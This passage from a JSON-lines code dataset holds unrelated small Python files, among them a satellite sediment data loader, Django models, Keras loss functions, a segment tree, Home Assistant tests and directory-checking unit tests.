app.run()\n","sub_path":"flask/sesion.py","file_name":"sesion.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317873332","text":"\n# process sediment values from all positions from all time, into a big dataframe.\n# each column represents a position in satellite image, over time\n\nimport os\nimport glob\nimport pandas as pd\nfrom netCDF4 import Dataset\nimport numpy as np\n\nroot_dir = '/data/results/batch_run'\ndef read_data(root_dir, variable = 'spm_nechad2016', nlats = 2946, nlons = 2718):\n \"\"\"\n Summary line.\n Extended description of function.\n Parameters\n ----------\n root_dir : str\n Starting point to locate the folder of the result files, each folder represents the date of satellite image\n variable : str\n Variable name specifying the algorithm used: spm_nechad2016, t_nechad2016, t_dogliotti, fai.\n The default is spm_nechad2016\n nlats : int\n Dimension of the longitudes, for the default the original value of 2946 is used.\n nlons : int\n Dimension of the latitudes, for the default the original value of 2718 is used.\n Returns\n -------\n df : DataFrame\n A dataframe with date and sediment values as columns. Each non-date column represents sediment in a location. 
\n Dates are a list of date strings with format Y%-m%-%d.\n Non-date columns contain the result for the given algorithm for each pixel/location,\n dimensions are nlats * nlon\n \"\"\"\n \n df = pd.DataFrame()\n for folder_name in os.listdir(root_dir):\n product_path = glob.glob(root_dir + '/' + folder_name + '/*L2W.nc')\n if '-' in folder_name: \n for file_name in product_path:\n nc = Dataset(file_name) \n data_temp = nc.variables[variable][:]\n data = data_temp.flatten('C') # flatten to a 1D array\n data_split = np.ma.hsplit(data, 1) # split into multiple array\n df_temp = pd.DataFrame(data_split)\n df_temp['date'] = folder_name\n df = pd.concat([df, df_temp])\n return df\n\n#df.to_csv('pd_all_sediment.csv', index=False) \n\n\n","sub_path":"data-preprocessing/sediment_all_positions.py","file_name":"sediment_all_positions.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"171792300","text":"# File for writing tests\nfrom frontend import cos_sim\n\ndef test_cos_sim():\n v1 = {'hitler' : 10}\n v2 = {'hitler' : 3}\n assert cos_sim(v1, v2) == 1.0\n\n v1 = {'hitler' : 1, 'nazi' : 1}\n v2 = {'banana' : 1, 'nazi' : 1}\n assert round(cos_sim(v1, v2), 2) == 0.5\n\n v1 = {}\n v2 = {'foo' : 30}\n assert cos_sim(v1, v2) == 0.0\n\nif __name__ == '__main__':\n test_cos_sim()\n","sub_path":"frontend/test_frontend.py","file_name":"test_frontend.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"392136693","text":"# class file for an Entity\n\n\nclass Entity:\n # class file for an Entity\n def __init__(self, position=None, glyph=None, renderable=False, movement=None, player_input=None, blocking=False):\n # initialization for self and components\n self.position = position\n self.glyph = glyph\n self.renderable = renderable\n self.movement = movement\n self.player_input = player_input\n self.blocking = blocking\n","sub_path":"Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478164493","text":"##method-1\n\nimport qrcode\nqr=qrcode.make(\"how is it going\")\nqr.save(\"sample.png\")\n\n##method-2\n\nqr=qrcode.QRCode(version=1,box_size=15,border=2)\ndata=(\"www.google.com\")\nqr.add_data(data)\nqr.make(fit=True)\nimg=qr.make_image(fill='red',back_color='black')\nimg.save(\"col.png\")\n","sub_path":"Auto_Scripts/QR.py","file_name":"QR.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160107317","text":"import canvasapi\nimport click\n\nfrom team_formation import config\nfrom team_formation.prompts import course_prompt\nfrom module_tools import quiz\nfrom module_tools import page\n\n@click.command()\n@click.option('--course_id',\n help='Canvas Course ID.',\n type=int,\n envvar='CANVAS_COURSE_ID')\n@click.option('--token',\n prompt=False,\n default=config.TOKEN,\n hide_input=True,\n help='Canvas API token.',\n required=True,\n envvar='CANVAS_API_TOKEN')\n@click.option('--url',\n # default='https://canvas.ubc.ca',\n default='https://ubc.test.instructure.com',\n # help='Canvas Url. [default: https://canvas.ubc.ca]',\n help='Canvas Url. 
[default: https://ubc.test.instructure.com]',\n required=True,\n envvar='CANVAS_BASE_URL')\n@click.option('--location',\n help='File Folder containing module content',\n prompt=True,\n required=True)\n\n\ndef create_module(url, token, course_id, location):\n canvas = canvasapi.Canvas(url, token)\n\n if not course_id:\n # prompt user to select a course they have access to (paginated)\n course_id = course_prompt(canvas)\n\n course = canvas.get_course(course_id)\n module = course.create_module(module={'name':'test module'})\n # create learning outcomes\n lo = page.create_page(course, \"Learning Outcomes\", location+'/Learning Outcomes.txt')\n # create pre-test\n # pret = course.create_quiz(quiz={'title':'pre-test'})\n pret = quiz.create_quiz(course, 'Pre-Test', loc=location+'/Quizformat.txt')\n # create post-test\n # postt = course.create_quiz(quiz={'title':'post-test'})\n postt = quiz.create_quiz(course, 'Post-Test', loc=location+'/Quizformat.txt')\n # create readings\n rea = page.create_page(course, 'Readings', loc=location+'/Readings.txt')\n # add videos\n #\n #add slides\n\n module.create_module_item(module_item={'title':'Learning Outcomes', 'type':'Page', \\\n 'content_id':None, 'page_url':lo})\n module.create_module_item(module_item={'title':'Pre-Test', 'type':'Quiz', \\\n 'content_id':pret})\n module.create_module_item(module_item={'title':'Post-Test', 'type':'Quiz', \\\n 'content_id':postt})\n module.create_module_item(module_item={'title':'Readings', 'type':'Page', \\\n 'content_id':None, 'page_url':rea})\n\nif __name__ == '__main__':\n create_module()","sub_path":"create_module.py","file_name":"create_module.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622593799","text":"import os\nimport json\n\ndef combine_jupyter_notebooks(notebooks_to_merge, combined_file_name):\n '''\n Combines multiple jupyter notebooks into one\n \n parameters:\n notebooks_to_merge (list): an ordered list of your .ipynb files to merge\n combined_file_name (string): name of the combined .ipynb file which will be generated.\n \n '''\n with open(notebooks_to_merge[0], mode='r', encoding='utf-8') as f:\n a = json.load(f)\n \n for notebook in notebooks_to_merge[1:]:\n with open(notebook, mode='r', encoding='utf-8') as f:\n b = json.load(f)\n a['cells'].extend(b['cells'])\n # extend here not append so that each dictionary in b['cells']\n # is added to new dictionary in a['cells']\n \n with open(combined_file_name, mode='w', encoding='utf-8') as f:\n json.dump(a, f)\n","sub_path":"age_predict/age_predict/Combine_jupyter_notebooks.py","file_name":"Combine_jupyter_notebooks.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544872979","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\nfrom django.db.models.signals import post_delete, pre_delete, post_save, pre_save\nfrom django.db.models.signals import post_migrate, pre_migrate, post_init, pre_init\n\nfrom django.dispatch import receiver\n\nfrom django.utils.safestring import mark_safe\n\nimport datetime\n\n# Create your models here.\n\n# Fields which are common\n# null = Default False\n# blank = Default False\n# verbose_name = No Default\n# default = need to set\n# validators = no default\n\nclass UserProfile(models.Model):\n fullname = models.CharField(\n max_length=30, # This is must\n # null=True,\n # 
blank=True,\n    )\n    active = models.BooleanField(\n        default=True,\n    )\n    added_on = models.DateTimeField(\n        auto_now_add=True,\n    )\n    lastupdate = models.DateTimeField(\n        auto_now=True,\n    )\n\n    birthdate = models.DateField()\n\n    login_time = models.TimeField()\n\n    balance = models.DecimalField(\n        max_digits=20,\n        decimal_places=2,\n        default = 0.0,\n        validators = [\n            MinValueValidator(0)\n        ]\n    )\n\n    tax = models.DecimalField(\n        max_digits=10,\n        decimal_places=2,\n        default = 0.0,\n        validators = [\n            MinValueValidator(0),\n            MaxValueValidator(100),\n        ]\n    )\n\n    logincount = models.IntegerField(\n        default=0,\n    )\n\n    email = models.EmailField()\n\n    gender = models.CharField(\n        max_length = 2,\n        choices = (\n            (\"M\", \"Male\"),\n            (\"F\", \"Female\"),\n        ),\n        default=\"M\",\n    )\n\n    @property\n    def age(self, *args, **kwargs):\n        return datetime.datetime.now().date() - self.birthdate\n\n    @property\n    def gotoGoogle(self, *args, **kwargs):\n        return mark_safe(\"\"\" Go to Google \"\"\")\n    def __str__(self, *args, **kwargs):\n        return self.fullname\n\nclass Address(models.Model):\n    address = models.TextField()\n\n    profile = models.ForeignKey(\n        'profiles.UserProfile',\n        on_delete = models.CASCADE,\n        related_name=\"address\",\n    )\n\nclass Relation(models.Model):\n    to_rel = models.ForeignKey(\n        'profiles.UserProfile',\n        on_delete = models.CASCADE,\n        related_name=\"relation_with\",\n    )\n    from_rel = models.ForeignKey(\n        'profiles.UserProfile',\n        on_delete = models.CASCADE,\n        related_name=\"my_relation\",\n    )\n    relation = models.CharField(\n        max_length = 2,\n        choices = (\n            (\"MO\", \"Mother\"),\n            (\"FA\", \"Father\"),\n            (\"SI\", \"Sister\"),\n            (\"BR\", \"Brother\"),\n            (\"DA\", \"Daughter\"),\n            (\"SO\", \"Son\"),\n        )\n    )\n\nreverse_relation = {\n    \"FA\" : { \"M\": \"SO\", \"F\":\"DA\"},\n    \"MO\" : { \"M\": \"SO\", \"F\":\"DA\"},\n    \"SI\" : { \"M\": \"BR\", \"F\": \"SI\" },\n    \"BR\" : { \"M\": \"BR\", \"F\": \"SI\" },\n    \"DA\" : { \"M\": \"FA\", \"F\": \"MO\"},\n    \"SO\" : { \"M\": \"FA\", \"F\": \"MO\"},\n}\n\n@receiver(post_save, sender=Relation)\n@receiver(post_save, sender=UserProfile)\ndef demoPostSave(sender, instance, *args, **kwargs):\n    print (\"IN POST SAVE THROUGH : \" + str(sender))\n\n@receiver(post_save, sender=Relation)\ndef CreateReverseRelation(sender, instance, *args, **kwargs):\n    # kwargs['created'] = True\n    print (\"IN THIS \")\n    if kwargs['created']:\n        print (\"2\")\n        try: \n            Relation.objects.get(\n                to_rel = instance.from_rel,\n                from_rel = instance.to_rel,\n                relation = reverse_relation[instance.relation][instance.from_rel.gender],\n            )\n        except models.ObjectDoesNotExist as e:\n            Relation.objects.create(\n                from_rel = instance.to_rel,\n                to_rel = instance.from_rel,\n                relation = reverse_relation[instance.relation][instance.from_rel.gender]\n            )","sub_path":"profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"18468077","text":"from django import forms\nfrom django.forms import ModelForm\nfrom models import Team\n\nclass TeamForm(ModelForm):\n\n    class Meta:\n        model = Team\n\n    def clean(self):\n        data = self.cleaned_data\n        if data['rerolls'] == None:\n            data['rerolls'] = 0\n\n        if data['fan_factor'] == None:\n            data['fan_factor'] = 0\n\n        if data['assistant_coaches'] == None:\n            data['assistant_coaches'] = 0\n\n        if data['cheerleaders'] == None:\n            data['cheerleaders'] = 0\n\n        if data['apothecary'] == None:\n            data['apothecary'] = 0\n\n        # Always return the cleaned data, whether you 
have changed it or\n # not.\n return data\n","sub_path":"testproject/bloodbench/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242951194","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\n\nf = open('dt_Tcool_Thot.txt','rb')\nparameters = pickle.load(f)\nf.close\n\ndt = parameters[0]\nTcool = parameters[1]\nThot = parameters[2]\nmfig = parameters[3] \nprint(mfig)\n\nfig = plt.figure()\nfor fignum in range(1,len(mfig)+1): # [ )\n m = mfig[fignum-1]\n print(m, fignum)\n ax = fig.add_subplot(220 + fignum) #may modify\n f = open('result'+str(fignum)+'.txt','rb')\n u = pickle.load(f)\n f.close\n im = ax.imshow(u.copy(), cmap=plt.get_cmap('rainbow'), vmin=Tcool,vmax=Thot)\n ax.set_axis_off() \n ax.set_title('{:.1f} ms'.format(m*dt*1000))\n\nfig.subplots_adjust(right=0.85)\ncbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7])\ncbar_ax.set_xlabel('$T$ / K', labelpad=20)\nfig.colorbar(im, cax=cbar_ax)\nplt.show()","sub_path":"heatResults_serial/plotcoolwarm.py","file_name":"plotcoolwarm.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499451879","text":"# Numerical Analysis (Math 328) at the City College of New York, CUNY\n# Exercise Set 2.3\n# Date: Sep/15/2015\n# Author: Minwoo Bae\n# Problem 07 - d): \n# Use the Secant method to find solutions accurate to within 10^-4 for \n# the following problems : x - 0.8 - 0.2*sin(x) = 0, [0, pi/2]\nimport math\nfrom sympy import *\n\ndef f(x):\n\treturn x - 0.8 - 0.2*math.sin(x)\n\ndef secantMethod(p_0, p_1, tol, num):\n\ti = 2\n\twhile i <= num:\n\t\tp = p_1 - (f(p_1)*(p_1 - p_0))/((f(p_1) - f(p_0)))\n\t\tif math.fabs(p - p_1) < tol:\n\t\t\treturn [p, i]\n\t\t\tbreak\n\t\ti+=1\n\t\tp_0 = p_1\n\t\tp_1 = p\n\n\tprint('The method failed after N_0 iterations, N_0 = '+str(num))\n\nprint('Enter tolerance: ')\ntol = float(input())\nprint('Enter maximum number of iterations N_0: ')\nnum = int(input())\nprint(secantMethod(0, math.pi/2, tol, num))","sub_path":"ex0203_07.py","file_name":"ex0203_07.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"332496387","text":"#Student_name: Harwinddranath Muralitheran\n#Student_ID: 22254937\n#CITS2401 - Lab_2_Part_4\n\n\ndef honeybee(h0,f0,L,w,m,n):\n \n parameters = [h0,f0,L,w,m,n]\n \n for i in range(len(parameters)):\n if parameters[i] < 0:\n print(\"Please enter positive integers only.\")\n return \n \n h_list = [round(h0)]\n f_list = [round(f0)]\n \n for ii in range(1,n+1):\n N = h_list[-1] + f_list[-1]\n h = round(h_list[-1] + L * (N / (w + N)) - h_list[-1] * (0.25 - 0.75 * (f_list[-1] / (N + 0.001))))\n if h < 0:\n h = 0\n f = round(f_list[-1] + h_list[-1] * (0.25 - 0.75 * (f_list[-1] / (N + 0.001))) - m * f_list[-1])\n if f < 0:\n f_list.append(0)\n else:\n f = round(f,0)\n f_list.append(int(f))\n h_list.append(h)\n H_max = max(h_list)\n F_max = max(f_list)\n \n return (h_list, f_list, H_max, F_max)","sub_path":"Muralitheran_22254937.py","file_name":"Muralitheran_22254937.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2587886","text":"import logging\nimport os\n\nfrom crawling import Crawler\nfrom slack_bot import SlackBot\n\nslack_channel = os.getenv('SLACK_CHANNEL')\nslack_token 
= os.getenv('SLACK_TOKEN')\n\nif slack_channel is None:\n raise Exception('Expected to find slack channel at environment variable \\\n SLACK_CHANNEL, found nothing')\nif slack_token is None:\n raise Exception('Expected to find slack token at environment variable \\\n SLACK_TOKEN, found nothing')\n\n\ndef handler(event, context):\n crawler = Crawler()\n crawler.load_phantom(os.path.join(os.getcwd(),\n 'bin',\n 'phantomjs'))\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n logger.info(\"Event: \" + str(event))\n posts = crawler.crawling()\n text = \"\\n\".join(map(str, posts))\n logger.info(\"Message: \" + text)\n\n if posts:\n bot = SlackBot(slack_token, slack_channel)\n a = bot.send_message(text)\n\n return a\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438591544","text":"import argparse\nimport math\nimport logging\nimport tensorflow as tf\nfrom inhousednn.task.filtering.loader import FilteringLoader\nfrom inhousednn.layer.bert.bert import BERT, BERTEmbedding\nfrom inhousednn.layer.attention import MultiHeadAttention, Transformer\nfrom inhousednn.layer.layer_normalization import LayerNormalization\nfrom inhousednn.layer.cnn import MultiKernelConv2d\n\nlogger = logging.getLogger()\nlogging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S')\nlogging.root.setLevel(level=logging.INFO)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--eval\", required=True,\n help=\"Eval set location\"\n )\n parser.add_argument(\n \"--model_path\", required=True,\n help=\"hdf5 model path\"\n )\n parser.add_argument(\n \"--gpu_num\", default=\"1\",\n type=int, help=\"default is 1.\"\n )\n parser.add_argument(\n \"--batch_size\", default=20,\n type=int, help=\"batch size\"\n )\n args = parser.parse_args()\n\n with tf.device('/cpu:0'):\n model = tf.keras.models.load_model(args.model_path,\n custom_objects={\n 'BERT': BERT,\n 'BERTEmbedding': BERTEmbedding,\n 'MultiHeadAttention': MultiHeadAttention,\n 'Transformer': Transformer,\n 'LayerNormalization': LayerNormalization,\n 'MultiKernelConv2d': MultiKernelConv2d\n })\n\n # configure multi gpus\n model = tf.keras.utils.multi_gpu_model(model, gpus=2)\n\n # data pipeline\n dataset_loader = FilteringLoader(\n bert_tokenizer_vocab='/nas/data/m2/zhangb8/data/bert/multi_cased_L-12_H-768_A-12',\n max_seq_len=128,\n is_train=True,\n pairwise=False,\n cache_size=50000\n )\n test_dataset = dataset_loader.load(args.eval)\n test_dataset_len = dataset_loader.num_instance(args.eval)\n logger.info('test data length: %d' % test_dataset_len)\n\n # compile model\n optimizer = tf.keras.optimizers.SGD(\n lr=0.001, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=1.\n )\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n model.evaluate(x=test_dataset,\n steps=math.ceil(test_dataset_len/args.batch_size),\n verbose=1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"inhousednn/task/filtering/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493169871","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 21 11:01:10 2016\n\n@author: dev-h3\n\"\"\"\nimport math\nclass SegmentSumTreeNode:\n def __init__(self, start, end, sumval):\n self.start, self.end, self.sum = 
start, end, sumval\n self.left, self.right = None, None\n\nclass Solution:\t\n root = None\n # @param A: An integer list\n def __init__(self, A):\n # write your code here\n self.root = self.buildSumSegmentTreeFromList(A,0,len(A)-1)\n \n def buildSumSegmentTreeFromList(self, A, start, end):\n if start > end:\n return None\n \n root = SegmentSumTreeNode(start, end, sum(A[start:end+1]))\n if start < end:\n root.left = self.buildSumSegmentTreeFromList(A, start, int(math.floor((start + end)/2)))\n root.right = self.buildSumSegmentTreeFromList(A, int(math.floor((start + end)/2))+1, end) \n return root\n\n def query(self, start, end):\n # write your code here\n return self.querySum(self.root, start, end)\n \n def querySum(self, root, start, end):\n if start > end:\n return 0\n if start > root.end or end < root.start:\n return 0\n if root.start >= start and root.end <= end:\n return root.sum\n \n return self.querySum(root.left, start, end)+self.querySum(root.right, start, end) \n \n # @param index, value: modify A[index] to value.\n def modify(self, index, value):\n # write your code here\n return self.modifySum(self.root, index, value)\n\n def modifySum(self, root, index, value):\n if index < root.start or index > root.end:\n return\n \n #if we get the node, we set the max value\n if root.start == root.end and index == root.start:\n root.sum=value\n return\n \n #If index is in the left tree range\n if index >= root.left.start and index <= root.left.end:\n self.modifySum(root.left, index, value)\n else:\n self.modifySum(root.right, index, value)\n root.sum = root.right.sum+root.left.sum \n \nsln = Solution([1,2,7,8,5])\nprint(sln.query(0,2))\nsln.modify(0,4)\nprint(sln.query(0,1))\nsln.modify(2,1)\nprint(sln.query(2,4))\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"589412248","text":"\"\"\"\npython -m unittest tests.test_powerpool\npython -m unittest tests.test_powerpool.TestSchedule.test__check_periodicity -v\n\nmake sure that home-assitant/tests/common.py is linked\n\"\"\"\nimport os\nimport sys\nfrom unittest import TestCase\n\nfrom homeassistant.helpers.entity_component import EntityComponent\nfrom homeassistant.setup import setup_component\n\nfrom tests.common import get_test_home_assistant\n\nfrom helper import fmt_print, rm_entity_from_entity_state\n\nfrom config.custom_components.energy_asset import EnergyAsset\nfrom config.custom_components.helper import dbg\nfrom config.custom_components.powerpool import PowerPool, DOMAIN, SCAN_INTERVAL, GROUP_NAME_ALL_PP_ASSETS\n\nimport logging\n\nfrom config.custom_components.pp_const import ENERGY_ASSET_DOMAIN, EVENT_ENERGY_ASSET_CREATED\n\n_LOGGER = logging.getLogger(__name__)\nlog_fmt = r'%(asctime)-15s %(levelname)s %(name)s %(funcName)s:%(lineno)d %(message)s'\nlogging.basicConfig(format=log_fmt, level=logging.DEBUG)\n\n\nclass Test_PowerPool(TestCase):\n def setUp(self):\n \"\"\"Setup things to be run when tests are started.\"\"\"\n self.hass = get_test_home_assistant()\n\n component = EntityComponent(_LOGGER, DOMAIN, self.hass, SCAN_INTERVAL, GROUP_NAME_ALL_PP_ASSETS)\n\n\n pp_name = 'xxx'\n config = {\n \"icon\": \"mdi:cancel\",\n }\n self.pp = PowerPool(self.hass, name=pp_name, config=config)\n\n component.add_entities([self.pp], update_before_add=True)\n\n self.asset1 = EnergyAsset(name='asset1',\n lat=10,\n lon=90,\n schedule=[1, 2, 3, 4, 5],\n max_flex=[1, 1, 1, 1, 1],\n 
min_flex=[1, 1, 1, 1, 1],\n powerpool=pp_name,\n hass=self.hass,\n status='installed'\n )\n self.hass.states.set(f\"{ENERGY_ASSET_DOMAIN}.asset1\", pp_name, self.asset1.state_attributes)\n\n self.asset2 = EnergyAsset(name='asset2',\n lat=11,\n lon=99,\n schedule=[11, 22, 33, 44, 55],\n max_flex=[1.1, 1.1, 1.1, 1.1, 1.1],\n min_flex=[1.1, 1.1, 1.1, 1.1, 1.1],\n powerpool=pp_name,\n hass=self.hass,\n status='installed'\n )\n self.hass.states.set(f\"{ENERGY_ASSET_DOMAIN}.asset2\", pp_name, self.asset2.state_attributes)\n\n def tearDown(self):\n \"\"\"Stop everything that was started.\"\"\"\n # remove all listeners\n for l in self.pp.listeners:\n _LOGGER.info(f\"{dbg()}: unregister listener: {l}\")\n l()\n\n self.hass.stop()\n\n\n def test__aggregate(self):\n self.pp._add_asset(f\"{ENERGY_ASSET_DOMAIN}.asset1\")\n self.pp._add_asset(f\"{ENERGY_ASSET_DOMAIN}.asset2\")\n self.pp.aggregate_schedule(None)\n\n self.assertListEqual(self.pp.aggregated_schedule, [12.0, 24.0, 36.0, 48.0, 60.0])\n self.assertListEqual(self.pp.aggregated_min_flex, [2.1, 2.1, 2.1, 2.1, 2.1])\n self.assertListEqual(self.pp.aggregated_max_flex, [2.1, 2.1, 2.1, 2.1, 2.1])\n\n def test_evt_energy_asset_created(self):\n self.pp.listeners = [\n self.hass.bus.listen(EVENT_ENERGY_ASSET_CREATED, self.pp.evt_energy_asset_created),\n ]\n self.hass.bus.fire(EVENT_ENERGY_ASSET_CREATED, {\"entity_id\": f\"{ENERGY_ASSET_DOMAIN}.asset1\"})\n self.hass.block_till_done()\n\n self.assertTrue(self.pp.assets.get('asset1', False))\n\n","sub_path":"config/custom_components/tests/test_powerpool.py","file_name":"test_powerpool.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478127596","text":"import numpy as np\nfrom sklearn.metrics import precision_recall_curve, recall_score, auc\n\ndef epsilonInsensitiveLoss(y_true, y_pred, epsilon=1.0):\n\t# Compute the epsilon-insensitive loss\n\timport keras.backend.theano_backend as K\n\tlossList = K.maximum(K.abs(y_true - y_pred) - epsilon, 0.)\n\treturn K.mean(lossList)\n\t\ndef reweightedCrossentropyLoss(y_true, y_pred):\n\t# Compute the re-weighted cross-entropy loss, where everything with label -1 is weighted to 0\n\timport keras.backend.theano_backend as K\n\timport theano.tensor as T\n\tnonAmbig = (y_true > -0.5)\n\tcnts = nonAmbig.sum(axis=0, keepdims=True)*1.0\n\tassert (T.gt(cnts, 0.0))\n\treturn K.mean(K.binary_crossentropy(y_pred*nonAmbig, y_true*nonAmbig)*y_true.shape[0]*1.0/cnts, axis=-1)\n\t\ndef taskweightedCrossentropyLoss(y_true, y_pred):\n\t# Compute the task-weighted cross-entropy loss, where every task is weighted by 1 - (fraction of non-ambiguous examples that are positive)\n\t# In addition, weight everything with label -1 to 0\n\timport keras.backend.theano_backend as K\n\timport theano.tensor as T\n\tnonAmbig = (y_true > -0.5)\n\tcnts = nonAmbig.sum(axis=0, keepdims=True)*1.0\n\tassert (T.gt(cnts, 0.0)) # Prevents division by 0\n\tpos = (y_true > 0.5)\n\tposCntsPerTask = pos.sum(axis=0, keepdims=True)*1.0\n\tassert (T.gt(posCntsPerTask, 0.0)) # Ensures that all tasks have at least 1 positive example\n\tweightsPerTask = 1.0 - (posCntsPerTask/cnts)\n\tweightsPerTaskRep = T.extra_ops.repeat(weightsPerTask, y_true.shape[0], axis=0)\n\tnonAmbigTimesWeightsPerTask = nonAmbig * weightsPerTaskRep\n\tnormConst = nonAmbigTimesWeightsPerTask.sum(axis=0, keepdims=True).sum(axis=1)*1.0\n\tassert (T.gt(normConst, 0.0)) # Prevents division by 0\n\treturn 
K.mean(K.binary_crossentropy(y_pred*nonAmbigTimesWeightsPerTask, y_true*nonAmbigTimesWeightsPerTask)*y_true.shape[0]*y_true.shape[1]*1.0/normConst, axis=-1)\n\n# Compute the logistic loss for a single element\ndef elementLogisticLoss(label, prediction):\n\tnegLogisticLoss = (label*np.log(prediction)) + ((1 - label) * np.log(1 - prediction))\n\treturn -negLogisticLoss\n\n# Compute the specificity\ndef negativeAccuracy(labels, predictedLabels):\n\tlabelsReverse = 1 - labels\n\tpredictedLabelsReverse = 1 - predictedLabels\n\treturn recall_score(labelsReverse, predictedLabelsReverse)\n\t\n# Get the AUPRC\ndef auPRC(y_true, y_score):\n\tprecision, recall, thresholds = precision_recall_curve(y_true, y_score)\n\treturn auc(recall, precision)\n\n# Get the recall at a specific FDR\ndef recallAtFdr(y_true, y_score, fdr_cutoff=0.05, returnCurve=False):\n\tprecision, recall, thresholds = precision_recall_curve(y_true, y_score)\n\tprecisionCutoff = 1 - fdr_cutoff\n\tcutoffIndex = 0\n\tfor i in range(len(precision)):\n\t\tif precision[i] >= precisionCutoff:\n\t\t\t# At the precision cutoff\n\t\t\tcutoffIndex = i\n\t\t\tbreak\n\tif returnCurve:\n\t\t# Return the PR curve in addition to the recall at the desired FDR\n\t\treturn [recall[cutoffIndex], precision, recall]\n\treturn recall[cutoffIndex]\n","sub_path":"evaluationScriptsCortexLiverModels/MLOperations.py","file_name":"MLOperations.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"512149615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 24 14:57:49 2014\n\n@author: Flora Vincent\n\"\"\"\nimport itertools\nimport is_prime\n\nfor i in itertools.count(100000000):\n    prime = is_prime.is_prime(i)\n    if prime is True:\n        print(i)\n        break\n","sub_path":"exercices/230/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"149230372","text":"from dircheck import dircheck\nimport sys\nimport os\nimport unittest\nimport tempfile\nimport shutil\n\ntest_dir = 'test-dir-123123'\n\nclass TestDircheck(unittest.TestCase):\n    def runDircheck(self, *args):\n        sys.argv = ['dircheck'] + list(args)\n        dircheck.Main()\n    \n    def assertSysExits(self, *args):\n        with self.assertRaises(SystemExit) as cm:\n            self.runDircheck(*args)\n        self.assertEqual(cm.exception.code, 1)\n    \n    def setUp(self):\n        if os.path.exists(test_dir):\n            shutil.rmtree(test_dir)\n        os.mkdir(test_dir)\n        os.chdir(test_dir)\n        for i in range(10):\n            os.system('echo {} > testfile-{}.txt'.format('%'*i*10, i))\n            os.mkdir('testdir-{}'.format(i))\n            os.system('echo test > testdir-{}/test.txt'.format(i))\n        self.runDircheck('hash', '.')\n\n    def test_no_change(self):\n        self.runDircheck('check', '.')\n\n    def test_new_file(self):\n        os.system('touch test.txt')\n        self.assertSysExits('check', '.')\n\n    def test_change_file(self):\n        os.system('echo testmore > testdir-0/test.txt')\n        self.assertSysExits('check', '.')\n\n    def test_change_file_2(self):\n        os.system('rm testdir-2/test.txt')\n        os.system('mkdir testdir-2/test.txt')\n        self.assertSysExits('check', '.')\n\n    def test_change_mtime(self):\n        os.system('touch testfile-0.txt')\n        self.assertSysExits('check', '.')\n\n    def tearDown(self):\n        os.chdir('..')\n        shutil.rmtree(test_dir) \n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_dircheck.py","file_name":"test_dircheck.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
